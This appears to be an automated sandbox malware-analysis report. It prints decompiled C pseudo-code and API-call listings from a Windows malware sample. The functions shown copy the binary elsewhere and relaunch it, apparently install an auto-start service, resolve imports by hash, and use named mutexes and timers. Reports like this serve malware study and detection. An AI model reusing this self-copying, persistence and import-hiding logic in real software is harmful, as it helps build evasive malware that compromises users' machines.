0x00000000
0x00000000
0x0005a3e2
0x0005a3e3
0x0005a3ec
0x0005a400
0x0005a409
0x0005a409
0x0005a41e
0x0005a424
0x0005a435
0x0005a438
0x0005a444
0x0005a45a
0x0005a45f
0x0005a469
0x0005a477
0x0005a48a
0x0005a4af
0x0005a4b4
0x0005a4c5
0x0005a4cc
0x0005a4e5
0x0005a4ea
0x0005a501
0x0005a514
0x0005a531
0x0005a536
0x0005a53f
0x0005a53f
0x0005a531
0x0005a545
0x00000000

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 0005A3D0
CloseHandle.KERNEL32(?), ref: 0005A409
GetTickCount.KERNEL32 ref: 0005A424
_snwprintf.NTDLL ref: 0005A477
GetProcessHeap.KERNEL32(00000000,?), ref: 0005A483
HeapFree.KERNEL32(00000000), ref: 0005A48A
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0005A4A9
WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0005A4C5
CloseHandle.KERNEL32(00000000), ref: 0005A4CC
_snwprintf.NTDLL ref: 0005A501
GetProcessHeap.KERNEL32(00000000,?), ref: 0005A50D
HeapFree.KERNEL32(00000000), ref: 0005A514
CloseHandle.KERNEL32(?), ref: 0005A536
CloseHandle.KERNEL32(?), ref: 0005A53F
GetTickCount.KERNEL32 ref: 0005A56B
_snwprintf.NTDLL ref: 0005A5BE
GetProcessHeap.KERNEL32(00000000,?), ref: 0005A5CA
HeapFree.KERNEL32(00000000), ref: 0005A5D1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0005A5F0
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0005A608
CloseHandle.KERNEL32(00000000), ref: 0005A60F
memset.NTDLL ref: 0005A61D
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0005A64A
CloseHandle.KERNEL32(?), ref: 0005A657
CloseHandle.KERNEL32(?), ref: 0005A660
GetProcessHeap.KERNEL32(00000000,?), ref: 0005A669
HeapFree.KERNEL32(00000000), ref: 0005A670

Strings

D, xrefs: 0005A626

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandle$Process$FileFree$Create_snwprintf$CountTickWrite$ActiveConsoleSessionmemset
String ID: D
API String ID: 65010116-2746444292
Opcode ID: eecacdfe5169a01f0c8de465650629cae55bdadb0f5e27a816c43d8aa318cc2f
Instruction ID: f1a7f619397df464deb3070859082009eac012273b00237e84e911a2309bdd1b
Opcode Fuzzy Hash: eecacdfe5169a01f0c8de465650629cae55bdadb0f5e27a816c43d8aa318cc2f
Instruction Fuzzy Hash: 56812B75940708BFFB109BA0DC49FEB7B7CEF09712F044151BA09E6192DB749A48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00059320, Relevance: 39.2, APIs: 26, Instructions: 246
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00059320(void* __ecx) {
				void* _v8;
				long _v12;
				short _v44;
				intOrPtr _t25;
				void* _t27;
				void* _t28;
				signed int _t32;
				char* _t35;
				int _t53;
				signed int _t60;
				void* _t71;
				long _t72;
				void* _t74;
				void* _t75;
				signed int _t76;
				char _t77;
				void* _t79;
				signed short* _t80;
				long _t87;
				void* _t92;
				void* _t94;
				short* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t106;

				_t75 = __ecx;
				_t25 =  *0x5c27c; // 0x0
				_t103 = _t102 - 0x28;
				 *0x5c3ac = _t25;
				GetModuleFileNameW(0, 0x5c9c8, 0x104);
				_t27 =  *0x5c040(0, 0, 6);
				if(_t27 != 0) {
					 *0x5c2a4 =  *0x5c2a4 | 0x00000001;
					 *0x5c0a8(_t27);
				}
				_t28 =  *0x5c3ac; // 0x0
				_t96 = 0x5c3b0;
				_v8 = _t28;
				_t92 = RtlAllocateHeap(GetProcessHeap(), 8, 0x15c);
				if(_t92 == 0) {
					_t92 = _v12;
				} else {
					_push(_t75);
					E00051790(0x513d0, 0x158, _t92);
					_t103 = _t103 + 8;
				}
				_t76 =  *0x5c1e4(_t92, _t71);
				_t72 = 2;
				_v12 = _t76;
				do {
					_t32 = _v8;
					_v8 =  !(_t32 / _t76);
					_t35 = _t92 + _t32 % _t76;
					if(_t35 <= _t92) {
						L9:
						if( *_t35 != 0x2c) {
							L11:
							_t77 =  *_t35;
							if(_t77 == 0) {
								goto L15;
							}
							while(_t77 != 0x2c) {
								_t35 = _t35 + 1;
								 *_t96 = _t77;
								_t96 = _t96 + 2;
								_t77 =  *_t35;
								if(_t77 != 0) {
									continue;
								}
								goto L15;
							}
							goto L15;
						}
						L10:
						_t35 = _t35 + 1;
						goto L11;
					}
					while( *_t35 != 0x2c) {
						_t35 = _t35 - 1;
						if(_t35 > _t92) {
							continue;
						}
						goto L9;
					}
					goto L10;
					L15:
					_t76 = _v12;
					_t72 = _t72 - 1;
				} while (_t72 != 0);
				HeapFree(GetProcessHeap(), 0, _t92);
				 *_t96 = 0;
				E00051830(0x51384, 0xc, 0x7d1cc189,  &_v12);
				_t104 = _t103 + 8;
				_push(0x5c5b8);
				_push(0);
				_push(0);
				if(( *0x5c2a4 & 0x00000001) == 0) {
					 *0x5c214(0, 0x1c);
					_t87 = 0x14;
					_t79 = 0x51530;
				} else {
					 *0x5c214(0, 0x29);
					_t87 = 4;
					_t79 = 0x51380;
				}
				E00051830(_t79, _t87, 0x7d1cc189,  &_v8);
				_t97 = _v8;
				 *0x5c200(0x5c5b8, 0x104, _t97, 0x5c5b8, 0x5c3b0);
				HeapFree(GetProcessHeap(), 0, _t97);
				_t98 = _v12;
				 *0x5c200(0x5c7c0, 0x104, _t98, 0x5c5b8, 0x5c3b0);
				_t106 = _t104 + 0x30;
				HeapFree(GetProcessHeap(), 0, _t98);
				_t99 = CreateFileW(0x5c9c8, 0x80000000, 1, 0, 3, 0, 0);
				if(_t99 != 0xffffffff) {
					_t94 = CreateFileMappingW(_t99, 0, 2, 0, 0, 0);
					if(_t94 != 0) {
						_t74 = MapViewOfFile(_t94, 4, 0, 0, 0);
						if(_t74 != 0) {
							 *0x5cbd0 = RtlComputeCrc32(0, _t74, GetFileSize(_t99, 0));
							UnmapViewOfFile(_t74);
						}
						CloseHandle(_t94);
					}
					CloseHandle(_t99);
				}
				_v12 = 0x10;
				_t53 = GetComputerNameW( &_v44,  &_v12);
				if(_t53 == 0) {
					L40:
					return _t53;
				} else {
					_t80 =  &_v44;
					if(_v44 == 0) {
						L36:
						_t101 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
						if(_t101 == 0) {
							_t101 = _v12;
						} else {
							_push(_t80);
							E00051790(0x51390, 8, _t101);
							_t106 = _t106 + 8;
						}
						 *0x5c210(0x5c2a8, 0x104, _t101,  &_v44,  *0x5c3ac);
						_t53 = HeapFree(GetProcessHeap(), 0, _t101);
						goto L40;
					}
					do {
						_t60 =  *_t80 & 0x0000ffff;
						if(_t60 < 0x30 || _t60 > 0x39) {
							if(_t60 < 0x61 || _t60 > 0x7a) {
								if(_t60 < 0x41 || _t60 > 0x5a) {
									 *_t80 = 0x58;
								}
							}
						}
						_t80 =  &(_t80[1]);
					} while ( *_t80 != 0);
					goto L36;
				}
			}

0x00059320
0x00059323
0x00059328
0x0005932b
0x0005933c
0x00059348
0x00059350
0x00059352
0x0005935a
0x0005935a
0x00059360
0x0005936e
0x00059373
0x00059383
0x00059387
0x0005939f
0x00059389
0x00059389
0x00059395
0x0005939a
0x0005939a
0x000593aa
0x000593ac
0x000593b1
0x000593b4
0x000593b4
0x000593bd
0x000593c0
0x000593c5
0x000593d1
0x000593d4
0x000593d7
0x000593d7
0x000593db
0x00000000
0x00000000
0x000593e0
0x000593e9
0x000593ea
0x000593ed
0x000593f0
0x000593f4
0x00000000
0x00000000
0x00000000
0x000593f4
0x00000000
0x000593e0
0x000593d6
0x000593d6
0x00000000
0x000593d6
0x000593c7
0x000593cc
0x000593cf
0x00000000
0x00000000
0x00000000
0x000593cf
0x00000000
0x000593f6
0x000593f6
0x000593f9
0x000593f9
0x00059406
0x00059413
0x00059424
0x00059429
0x00059433
0x00059438
0x0005943a
0x0005943c
0x00059458
0x0005945e
0x00059463
0x0005943e
0x00059442
0x00059448
0x0005944d
0x0005944d
0x00059471
0x00059476
0x0005948e
0x000594a1
0x000594a7
0x000594bf
0x000594c5
0x000594d2
0x000594f2
0x000594f7
0x0005950a
0x0005950e
0x0005951f
0x00059523
0x00059539
0x0005953e
0x0005953e
0x00059545
0x00059545
0x0005954c
0x0005954c
0x00059555
0x00059561
0x0005956a
0x0005960b
0x00059610
0x00059570
0x00059575
0x00059578
0x000595ad
0x000595be
0x000595c2
0x000595da
0x000595c4
0x000595c4
0x000595d0
0x000595d5
0x000595d5
0x000595f2
0x00059605
0x00000000
0x00059605
0x00059580
0x00059580
0x00059586
0x00059590
0x0005959a
0x000595a1
0x000595a1
0x0005959a
0x00059590
0x000595a4
0x000595a7
0x00000000
0x00059580

APIs

GetModuleFileNameW.KERNEL32(00000000,0005C9C8,00000104,?,?,?,?,?,?,?,?,?,00059310), ref: 0005933C
GetProcessHeap.KERNEL32(00000008,0000015C,00000000,000516C0,?,?,?,?,?,?,?,?,?,00059310), ref: 00059376
RtlAllocateHeap.NTDLL(00000000), ref: 0005937D
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00059310), ref: 000593A4
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00059310), ref: 000593FF
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00059310), ref: 00059406
_snwprintf.NTDLL ref: 0005948E
GetProcessHeap.KERNEL32(00000000,00059310), ref: 0005949A
HeapFree.KERNEL32(00000000), ref: 000594A1
_snwprintf.NTDLL ref: 000594BF
GetProcessHeap.KERNEL32(00000000,?), ref: 000594CB
HeapFree.KERNEL32(00000000), ref: 000594D2
CreateFileW.KERNEL32(0005C9C8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000594EC
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00059504
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00059519
GetFileSize.KERNEL32(00000000,00000000), ref: 00059528
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00059532
UnmapViewOfFile.KERNEL32(00000000), ref: 0005953E
CloseHandle.KERNEL32(00000000), ref: 00059545
CloseHandle.KERNEL32(00000000), ref: 0005954C
GetComputerNameW.KERNEL32(?,?), ref: 00059561
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 000595B1
RtlAllocateHeap.NTDLL(00000000), ref: 000595B8
_snprintf.NTDLL ref: 000595F2
GetProcessHeap.KERNEL32(00000000,00000010), ref: 000595FE
HeapFree.KERNEL32(00000000), ref: 00059605

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$Free$AllocateCloseCreateHandleNameView_snwprintf$ComputeComputerCrc32MappingModuleSizeUnmap_snprintflstrlen
String ID:
API String ID: 968319538-0
Opcode ID: 499ef0a9bced9025464c452e1eea16b240f68a30d1bedec4c3058615a3c879ad
Instruction ID: afb6dbdd0063a19e776b4fa13e65aa5fb988117e0deec9b2b24f1c54ea0e5871
Opcode Fuzzy Hash: 499ef0a9bced9025464c452e1eea16b240f68a30d1bedec4c3058615a3c879ad
Instruction Fuzzy Hash: 97819071640704FFFB205BA49C4DF9B3BA8EB4AB03F140055FE05EA1D1EAB89A48C765

Uniqueness

Uniqueness Score: -1.00%

Function 00059C50, Relevance: 36.2, APIs: 24, Instructions: 185
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00059C50(void* __ecx) {
				void* _v8;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;

				_push(__ecx);
				E00051830(0x5155c, 0xc, 0x4a604ebc,  &_v8);
				_t100 = _v8;
				E00051B10(LoadLibraryW(_t100), 0x51040, 0x21, 0x54b7e774, 0x5c040);
				HeapFree(GetProcessHeap(), 0, _t100);
				E00051830(0x51568, 0xc, 0x4a604ebc,  &_v8);
				_t101 = _v8;
				E00051B10(LoadLibraryW(_t101), 0x51024, 1, 0x3c505b91, 0x5c0c8);
				HeapFree(GetProcessHeap(), 0, _t101);
				E00051830(0x51574, 0xc, 0x4a604ebc,  &_v8);
				_t102 = _v8;
				E00051B10(LoadLibraryW(_t102), 0x51028, 2, 0x10577008, 0x5c214);
				HeapFree(GetProcessHeap(), 0, _t102);
				E00051830(0x51580, 0xc, 0x4a604ebc,  &_v8);
				_t103 = _v8;
				E00051B10(LoadLibraryW(_t103), 0x5100c, 1, 0x7194b56b, 0x5c0c4);
				HeapFree(GetProcessHeap(), 0, _t103);
				E00051830(0x51550, 0xc, 0x4a604ebc,  &_v8);
				_t104 = _v8;
				E00051B10(LoadLibraryW(_t104), 0x510c4, 1, 0x20edec96, 0x5c0cc);
				HeapFree(GetProcessHeap(), 0, _t104);
				E00051830(0x51544, 0xc, 0x4a604ebc,  &_v8);
				_t105 = _v8;
				E00051B10(LoadLibraryW(_t105), 0x510c8, 2, 0x620cb38e, 0x5c21c);
				HeapFree(GetProcessHeap(), 0, _t105);
				E00051830(0x51598, 0xc, 0x4a604ebc,  &_v8);
				_t106 = _v8;
				E00051B10(LoadLibraryW(_t106), 0x51220, 0xe, 0x5a7185ae, 0x5c230);
				HeapFree(GetProcessHeap(), 0, _t106);
				E00051830(0x5158c, 0xc, 0x4a604ebc,  &_v8);
				_t107 = _v8;
				E00051B10(LoadLibraryW(_t107), 0x51214, 3, 0x73ee0ad8, 0x5c224);
				HeapFree(GetProcessHeap(), 0, _t107);
				return E000592A0(_t61);
			}

0x00059c53
0x00059c68
0x00059c6d
0x00059c8d
0x00059c9f
0x00059cb8
0x00059cbd
0x00059cdd
0x00059cef
0x00059d08
0x00059d0d
0x00059d2d
0x00059d3f
0x00059d58
0x00059d5d
0x00059d7d
0x00059d8f
0x00059da8
0x00059dad
0x00059dcd
0x00059ddf
0x00059df8
0x00059dfd
0x00059e1d
0x00059e2f
0x00059e48
0x00059e4d
0x00059e6d
0x00059e7f
0x00059e98
0x00059ea0
0x00059ebd
0x00059ecf
0x00059ede

APIs

Part of subcall function 00051830: GetProcessHeap.KERNEL32(00000008,00059F6B,00000000,00000000,00051004,?,000515F4,4DBAC13F,00059F6B,?,00000000), ref: 00051844
Part of subcall function 00051830: RtlAllocateHeap.NTDLL(00000000,?,000515F4), ref: 0005184B

LoadLibraryW.KERNEL32(000516C0,?,000516C0), ref: 00059C74
GetProcessHeap.KERNEL32(00000000,000516C0,?,?,?,?,000516C0), ref: 00059C98
HeapFree.KERNEL32(00000000,?,?,?,?,000516C0), ref: 00059C9F
LoadLibraryW.KERNEL32(000516C0,?,?,?,?,?,?,000516C0), ref: 00059CC4
GetProcessHeap.KERNEL32(00000000,000516C0,?,?,?,?,?,?,?,?,?,000516C0), ref: 00059CE8
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,000516C0), ref: 00059CEF
LoadLibraryW.KERNEL32(000516C0,?,?,?,?,?,?,?,?,?,?,?,000516C0), ref: 00059D14
GetProcessHeap.KERNEL32(00000000,000516C0), ref: 00059D38
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000516C0), ref: 00059D3F
LoadLibraryW.KERNEL32(000516C0), ref: 00059D64
GetProcessHeap.KERNEL32(00000000,000516C0), ref: 00059D88
HeapFree.KERNEL32(00000000), ref: 00059D8F
LoadLibraryW.KERNEL32(000516C0), ref: 00059DB4
GetProcessHeap.KERNEL32(00000000,000516C0), ref: 00059DD8
HeapFree.KERNEL32(00000000), ref: 00059DDF
LoadLibraryW.KERNEL32(000516C0), ref: 00059E04
GetProcessHeap.KERNEL32(00000000,000516C0), ref: 00059E28
HeapFree.KERNEL32(00000000), ref: 00059E2F
LoadLibraryW.KERNEL32(000516C0), ref: 00059E54
GetProcessHeap.KERNEL32(00000000,000516C0), ref: 00059E78
HeapFree.KERNEL32(00000000), ref: 00059E7F
LoadLibraryW.KERNEL32(000516C0), ref: 00059EA4
GetProcessHeap.KERNEL32(00000000,000516C0), ref: 00059EC8
HeapFree.KERNEL32(00000000), ref: 00059ECF

Part of subcall function 000592A0: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 000592B5

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeLibraryLoad$AllocateDirectoryWindows
String ID:
API String ID: 357832750-0
Opcode ID: f130ede651f914704a85d1895b01b155b7ce1e61a8cf0912ac62d6be09bbb78d
Instruction ID: 0b11e06a42115581c5fac983679aaf806b2ac596371370d3de3067d02091b658
Opcode Fuzzy Hash: f130ede651f914704a85d1895b01b155b7ce1e61a8cf0912ac62d6be09bbb78d
Instruction Fuzzy Hash: A7516371A40704BFFF1067A0AC1AFDF3A59DB46707F100414FE05AB283EA795E5987A9

Uniqueness

Uniqueness Score: -1.00%

Function 00059060, Relevance: 34.7, APIs: 23, Instructions: 160
memorysynchronizationtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00059060(void* __eflags) {
				void* _v8;
				char _v12;
				short _v140;
				short _v268;
				short _v396;
				long _t31;
				void* _t45;
				void* _t47;
				long _t50;
				long _t57;
				int _t59;
				signed int _t60;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;

				_t59 = 0;
				memset(0x5c284, 0, 0x18);
				_t60 = 0x51364;
				_t2 = _t59 + 0xc; // 0xc
				E00051830(0x51364, _t2, 0x4a604ebc,  &_v8);
				_t67 = _v8;
				 *0x5c200( &_v140, 0x40, _t67,  *0x5c27c);
				HeapFree(GetProcessHeap(), 0, _t67);
				_t66 = CreateMutexW(0, 0,  &_v140);
				if(_t66 == 0) {
					L12:
					 *0x5c0b8( *0x5c288);
					 *0x5c064( *0x5c28c);
					 *0x5c064( *0x5c290);
					 *0x5c08c( *0x5c284, 0);
					E00058AA0();
					return E0005A750(_t60 | 0xffffffff);
				}
				_t31 = WaitForSingleObject(_t66, 0);
				if(_t31 == 0 || _t31 == 0x80) {
					E00051830(0x51258, 0xc, 0x4a604ebc,  &_v8);
					_t68 = _v8;
					 *0x5c200( &_v396, 0x40, _t68,  *0x5c27c);
					HeapFree(GetProcessHeap(), 0, _t68);
					_t60 = 0x51264;
					E00051830(0x51264, 0xc, 0x4a604ebc,  &_v8);
					_t69 = _v8;
					 *0x5c200( &_v268, 0x40, _t69,  *0x5c27c);
					HeapFree(GetProcessHeap(), 0, _t69);
					_t45 = CreateMutexW(0, 0,  &_v268);
					 *0x5c2a0 = _t45;
					if(_t45 == 0) {
						goto L12;
					}
					_t47 = CreateEventW(0, 0, 0,  &_v396);
					 *0x5c29c = _t47;
					if(_t47 != 0) {
						_t57 = SignalObjectAndWait(_t47,  *0x5c2a0, 0xffffffff, 0);
						if(_t57 == 0 || _t57 == 0x80) {
							_t59 = ResetEvent( *0x5c29c);
						}
					}
					ReleaseMutex(_t66);
					CloseHandle(_t66);
					if(_t59 != 0) {
						_t50 = GetTickCount();
						_push(0x10);
						_push(0x3e8);
						_push(0x3e8);
						_push(0);
						 *0x5c280 = 1;
						_push(E00058DD0);
						 *0x5c278 = _t50 + 0x3e8;
						_push(0);
						_push( &_v12);
						if( *0x5c0ec() != 0) {
							WaitForSingleObject( *0x5c29c, 0xffffffff);
							 *0x5c138(0, _v12, 0xffffffff);
						}
						CloseHandle( *0x5c29c);
					}
				}
			}

0x0005906e
0x00059076
0x0005907f
0x0005908a
0x0005908d
0x00059098
0x000590a5
0x000590b7
0x000590cc
0x000590d0
0x0005924f
0x00059255
0x00059261
0x0005926d
0x0005927b
0x00059281
0x00059294
0x00059294
0x000590d8
0x000590e0
0x00059100
0x0005910b
0x00059118
0x0005912b
0x0005913f
0x00059144
0x0005914f
0x0005915c
0x0005916f
0x00059180
0x00059186
0x0005918d
0x00000000
0x00000000
0x000591a0
0x000591a6
0x000591ad
0x000591ba
0x000591c2
0x000591d7
0x000591d7
0x000591c2
0x000591da
0x000591e1
0x000591e9
0x000591eb
0x000591f1
0x000591f3
0x000591f8
0x000591fd
0x00059204
0x0005920e
0x00059213
0x0005921b
0x0005921d
0x00059226
0x00059230
0x0005923d
0x0005923d
0x00059249
0x00059249
0x000591e9

APIs

memset.NTDLL ref: 00059076

Part of subcall function 00051830: GetProcessHeap.KERNEL32(00000008,00059F6B,00000000,00000000,00051004,?,000515F4,4DBAC13F,00059F6B,?,00000000), ref: 00051844
Part of subcall function 00051830: RtlAllocateHeap.NTDLL(00000000,?,000515F4), ref: 0005184B

_snwprintf.NTDLL ref: 000590A5
GetProcessHeap.KERNEL32(00000000,00059315), ref: 000590B0
HeapFree.KERNEL32(00000000), ref: 000590B7
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 000590C6
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 000590D8
_snwprintf.NTDLL ref: 00059118
GetProcessHeap.KERNEL32(00000000,00059315), ref: 00059124
HeapFree.KERNEL32(00000000), ref: 0005912B
_snwprintf.NTDLL ref: 0005915C
GetProcessHeap.KERNEL32(00000000,00059315), ref: 00059168
HeapFree.KERNEL32(00000000), ref: 0005916F
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00059180
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 000591A0
SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 000591BA
ResetEvent.KERNEL32 ref: 000591D1
ReleaseMutex.KERNEL32(00000000), ref: 000591DA
CloseHandle.KERNEL32(00000000), ref: 000591E1
GetTickCount.KERNEL32 ref: 000591EB
CreateTimerQueueTimer.KERNEL32(?,00000000,00058DD0,00000000,000003E8,000003E8,00000010), ref: 0005921E
WaitForSingleObject.KERNEL32(000000FF), ref: 00059230
DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 0005923D
CloseHandle.KERNEL32 ref: 00059249

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$CreateProcessTimer$FreeMutexObjectWait_snwprintf$CloseEventHandleQueueSingle$AllocateCountDeleteReleaseResetSignalTickmemset
String ID:
API String ID: 3199319163-0
Opcode ID: d7ccb4046f206af28cdec9873e23f142e9fae43c1c9bf92bfa2438b1ad26ec35
Instruction ID: e8653877b683b82efa7fe5af941a6242f78cf556cb73ee07bc54ef38669d0c5d
Opcode Fuzzy Hash: d7ccb4046f206af28cdec9873e23f142e9fae43c1c9bf92bfa2438b1ad26ec35
Instruction Fuzzy Hash: A5514971544305FFFF505BA0EC49F9B3B68EB06713F104125BA1AE21E1DE789A44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00059620, Relevance: 31.8, APIs: 21, Instructions: 284
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E00059620(void* __ecx, void* __edx) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				long _v46;
				struct _PROCESS_INFORMATION _v52;
				WCHAR* _v56;
				intOrPtr _v60;
				void _v64;
				void* _v68;
				struct _STARTUPINFOW _v140;
				short _v660;
				int _t56;
				void* _t64;
				long _t71;
				void* _t74;
				signed int _t103;
				long _t115;
				void* _t119;
				void* _t120;
				void* _t123;
				intOrPtr _t125;
				void* _t126;
				intOrPtr _t127;
				intOrPtr* _t129;

				_t56 = lstrcmpiW(0x5c9c8, 0x5c7c0);
				if(_t56 != 0) {
					E000518D0();
					memset( &_v660, 0, 0x208);
					memset( &_v64, 0, 0x1e);
					_v60 = 1;
					_v56 = 0x5c9c8;
					_v52.hThread = 0xe14;
					_v52.hProcess = 0x5c7c0;
					_t64 =  *0x5c218( &_v64);
					if(_t64 != 0 || _v46 != _t64) {
						GetTempPathW(0x104,  &_v660);
						GetTempFileNameW( &_v660, 0, 0,  &_v660);
						_v56 = 0x5c7c0;
						_v52.hProcess =  &_v660;
						_v46 = 0;
						_t71 =  *0x5c218( &_v64);
						if(_t71 != 0 || _v46 != _t71) {
							goto L35;
						} else {
							_v46 = _t71;
							_v56 = 0x5c9c8;
							_v52.hProcess = 0x5c7c0;
							_t74 =  *0x5c218( &_v64);
							if(_t74 != 0 || _v46 != _t74) {
								goto L35;
							} else {
								goto L8;
							}
						}
					} else {
						L8:
						E00051970();
						if(( *0x5c2a4 & 0x00000001) == 0) {
							memset( &_v140, 0, 0x44);
							_v140.cb = 0x44;
							_v140.dwFlags = 0x80;
							if(CreateProcessW(0x5c7c0, 0, 0, 0, 0, 0, 0, 0,  &_v140,  &_v52) != 0) {
								CloseHandle(_v52);
								CloseHandle(_v52.hThread);
							}
							goto L35;
						} else {
							_t125 =  *0x5c040(0, 0, 6);
							_v28 = _t125;
							if(_t125 == 0) {
								L35:
								return 1;
							} else {
								_t127 =  *0x5c0c0(_t125, 0x5c3b0, 0x5c3b0, 0x12, 0x10, 2, 0, 0x5c7c0, 0, 0, 0, 0, 0);
								_v24 = _t127;
								if(_t127 != 0) {
									_push(0);
									_push(0);
									_v12 = 0;
									_push( &_v32);
									_push( &_v20);
									_push(0);
									_push(0);
									_push(3);
									_push(0x30);
									_push(0);
									_push(_t125);
									if( *0x5c054() == 0 && GetLastError() == 0xea) {
										_t119 = RtlAllocateHeap(GetProcessHeap(), 8, _v20);
										_v68 = _t119;
										if(_t119 != 0) {
											_push(0);
											_push(0);
											_push( &_v32);
											_push( &_v20);
											_push(_v20);
											_push(_t119);
											_push(3);
											_push(0x30);
											_push(0);
											_push(_t125);
											if( *0x5c054() == 0) {
												_t120 = _v16;
											} else {
												_t103 =  *0x5c3ac; // 0x0
												_t123 = _v32 * 0x2c + _t119;
												_v16 = _t123;
												_t120 = _v16;
												_t129 =  <  ? (_t103 & 0x0000000f) * 0x2c + _t119 : _t119;
												while(_t129 < _t123) {
													_t126 =  *0x5c088(_t125,  *_t129, 1);
													if(_t126 != 0) {
														_push( &_v8);
														_push(0);
														_push(0);
														_push(1);
														_push(_t126);
														if( *0x5c0b0() == 0 && GetLastError() == 0x7a) {
															_t120 = RtlAllocateHeap(GetProcessHeap(), 8, _v8);
															if(_t120 != 0) {
																_t115 =  *0x5c0b0(_t126, 1, _t120, _v8,  &_v8);
																_v12 = _t115;
																if(_t115 == 0) {
																	HeapFree(GetProcessHeap(), _t115, _t120);
																}
															}
														}
														 *0x5c0a8(_t126);
													}
													_t125 = _v28;
													_t129 = _t129 + 0x2c;
													_t123 = _v16;
													if(_v12 == 0) {
														continue;
													}
													break;
												}
												_t127 = _v24;
											}
											HeapFree(GetProcessHeap(), 0, _v68);
											if(_v12 != 0) {
												 *0x5c090(_t127, 1, _t120);
												HeapFree(GetProcessHeap(), 0, _t120);
											}
										}
									}
								} else {
									_t127 =  *0x5c088(_t125, 0x5c3b0, 0x10);
								}
								if(_t127 != 0) {
									 *0x5c048(_t127, 0, 0);
									 *0x5c0a8(_t127);
								}
								 *0x5c0a8(_t125);
								return 1;
							}
						}
					}
				} else {
					return _t56;
				}
			}

0x00059636
0x0005963e
0x00059647
0x0005965a
0x0005966b
0x00059674
0x00059680
0x00059687
0x0005968e
0x00059696
0x0005969e
0x000596b5
0x000596c7
0x000596d3
0x000596da
0x000596e1
0x000596e8
0x000596f0
0x00000000
0x000596ff
0x000596ff
0x00059706
0x0005970d
0x00059714
0x0005971c
0x00000000
0x00000000
0x00000000
0x00000000
0x0005971c
0x0005972b
0x0005972b
